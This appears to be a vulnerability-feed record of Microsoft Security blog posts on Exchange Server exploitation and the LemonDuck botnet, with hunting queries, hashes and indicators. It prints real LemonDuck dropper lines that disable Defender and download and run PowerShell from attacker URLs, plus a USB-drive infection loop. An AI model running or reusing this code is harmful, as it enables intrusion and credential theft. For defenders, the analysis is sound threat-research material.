[Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions **\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems that have been suspected as compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence **\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft **\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows for the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here, the threats may utilize files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web shells observed during attacks:\n\n * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41\n * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc\n * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d\n\nDoejoCrypt associated hashes:\n\n * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27\n * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da\n * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff\n * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3\n * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748\n * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6\n * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65\n * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede\n\nLemon Duck associated hashes:\n\n * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc\n * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec\n * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9\n * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c\n * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e\n * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4\n * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e\n * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719\n * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd\n * a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85\n * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09\n * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd\n * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd\n * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501\n * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f\n * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0\n\nPydomer associated hashes:\n\n * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382\n * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\n * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\n * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287\n * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f\n * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T21:21:07", "type": "mmpc", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MMPC:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T00:39:50", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n![World map showing geographic distribution of LemonDuck activity](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/lemon-duck-geographic-distribution.png)\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n![Diagram showing attacker activity following infection of LemonDuck malware, highlight activities common to the LemonDuck and LemonCat infrastructure, and showing unique behavior for each](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/attack-chain.png)\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n![Screenshot of email related to LemonDuck attack](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/lemon-duck-email-sample.png)\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n![Diagram showing chain of attacks from the LemonDuck and LemonCat infrastructure, detailing specific attacker behavior common to both and highlight behavior unique to each infra](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/attack-chain.png)\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally 